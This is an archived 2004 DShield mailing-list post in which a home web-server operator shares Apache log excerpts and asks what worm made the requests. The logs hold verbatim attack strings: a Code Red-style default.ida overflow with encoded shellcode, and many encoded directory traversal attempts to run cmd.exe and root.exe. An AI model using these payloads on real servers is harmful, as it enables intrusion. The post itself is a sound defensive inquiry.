[Dshield] Suspect HTTP-activity

Martin Agren martin.agren at home.se
Fri Jan 23 18:30:55 GMT 2004


Hello,
I'm a fresh subscriber to this list and the very reason I stumbled upon 
it was that I was investigating some activity that apache logged and 
that made me a little supicious about the intentions behind the 
requests. So first of, Hello!

I've been trying to go through the most recent archives and while what 
you discuss seems to be both interesting and important, I haven't found 
anything that match my query.

If this is the wrong place for my question, I can take pointers to other 
lists/sites for an answer. :-)

Below are excerpts from my apache/access.log (I'm running Win2000Pro). I 
haven't publicly announced my web-server in any way -- I just use it for 
development of web-code and invite other developers to check it out.

Most of these logs seems to indicate nothing actually happened 
(404-status), but I'm curious as to what it's all about and if anyone 
might be interested in this information. Any DShield-like service that 
collects apache-logs? ;-)

Most of these requests seems to be someone wanting to list my disk.

Are there any known worms that create these requests? Should I act in 
any way?

Any help is much appreciated!

If anyone wants me to post more logs, I can do so (it's basically just 
the same requests a couple of times)

Martin

218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
HTTP/1.0" 404 308
127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 
404 320
210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET 
/scripts/nsiislog.dll" 404 -
202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 307
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/MSADC/root.exe?/c+dir HTTP/1.0" 404 305
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 346
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 346
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 362
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329




More information about the list mailing list